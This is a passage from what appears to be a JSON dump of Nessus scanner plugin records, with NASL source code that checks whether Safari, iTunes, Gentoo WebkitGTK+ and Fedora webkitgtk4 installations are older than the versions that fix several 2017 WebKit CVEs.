\"Windows\");\n\nfixed_version = \"12.7.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:37:43", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.0.2. It is, therefore, affected by multiple vulnerabilities as described in the HT208324 security advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-03T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105515);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-13-5\");\n\n script_name(english:\"macOS : Apple Safari < 11.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.0.2. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208324 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208324\");\n # https://lists.apple.com/archives/security-announce/2017/Dec/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?752a7790\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n{\n audit(AUDIT_OS_NOT, \"Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13\");\n} \n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"11.0.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:38:21", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.2. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105651", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105651);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-13856\",\n \"CVE-2017-13866\",\n \"CVE-2017-13870\"\n );\n script_bugtraq_id(102181, 102192);\n\n script_name(english:\"Apple iTunes < 12.7.2 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.2. It is, therefore, affected by multiple vulnerabilities \nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208326\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:38:17", "description": "The remote host is affected by the vulnerability described in GLSA-201801-09 (WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. Please review the referenced CVE Identifiers for details.\n Impact :\n\n An attacker, by enticing a user to visit maliciously crafted web content, may be able to execute arbitrary code or cause memory corruption.\n Workaround :\n\n There are no known workarounds at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-08T00:00:00", "type": "nessus", "title": "GLSA-201801-09 : WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7157"], "modified": "2018-01-26T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:webkit-gtk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201801-09.NASL", "href": "https://www.tenable.com/plugins/nessus/105635", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201801-09.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105635);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/26 17:15:58 $\");\n\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\", \"CVE-2017-7157\");\n script_xref(name:\"GLSA\", value:\"201801-09\");\n\n script_name(english:\"GLSA-201801-09 : WebkitGTK+: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201801-09\n(WebkitGTK+: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebkitGTK+. Please\n review the referenced CVE Identifiers for details.\n \nImpact :\n\n An attacker, by enticing a user to visit maliciously crafted web\n content, may be able to execute arbitrary code or cause memory\n corruption.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201801-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebkitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.18.4:4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.18.4\"), vulnerable:make_list(\"lt 2.18.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebkitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:36:53", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-13866](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13866), [CVE-2017-13870](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13870), [CVE-2017-7156](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7156), [CVE-2017-13856](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13856)\n\nAdditional fixes :\n\n - Make WebDriver implementation more spec compliant.\n\n - Fix a bug when trying to remove cookies before a web process is spawned.\n\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n\n - Fix several memory leaks in GStreamer media backend.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-15T00:00:00", "type": "nessus", "title": "Fedora 27 : webkitgtk4 (2017-06b373d942)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-06B373D942.NASL", "href": "https://www.tenable.com/plugins/nessus/105807", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-06b373d942.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105807);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\");\n script_xref(name:\"FEDORA\", value:\"2017-06b373d942\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2017-06b373d942)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-13866](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13866),\n [CVE-2017-13870](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13870),\n [CVE-2017-7156](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7156),\n [CVE-2017-13856](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13856)\n\nAdditional fixes :\n\n - Make WebDriver implementation more spec compliant.\n\n - Fix a bug when trying to remove cookies before a web\n process is spawned.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several memory leaks in GStreamer media backend.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-06b373d942\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.18.4-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:38:37", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-13866](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13866), [CVE-2017-13870](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13870), [CVE-2017-7156](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7156), [CVE-2017-13856](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13856)\n\nAdditional fixes :\n\n - Make WebDriver implementation more spec compliant.\n\n - Fix a bug when trying to remove cookies before a web process is spawned.\n\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n\n - Fix several memory leaks in GStreamer media backend.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Fedora 26 : webkitgtk4 (2017-0ad0e2f390)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-0AD0E2F390.NASL", "href": "https://www.tenable.com/plugins/nessus/105705", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0ad0e2f390.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105705);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-7156\");\n script_xref(name:\"FEDORA\", value:\"2017-0ad0e2f390\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2017-0ad0e2f390)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-13866](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13866),\n [CVE-2017-13870](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13870),\n [CVE-2017-7156](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7156),\n [CVE-2017-13856](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13856)\n\nAdditional fixes :\n\n - Make WebDriver implementation more spec compliant.\n\n - Fix a bug when trying to remove cookies before a web\n process is spawned.\n\n - WebKitWebDriver process no longer links to\n libjavascriptcoregtk.\n\n - Fix several memory leaks in GStreamer media backend.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0ad0e2f390\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 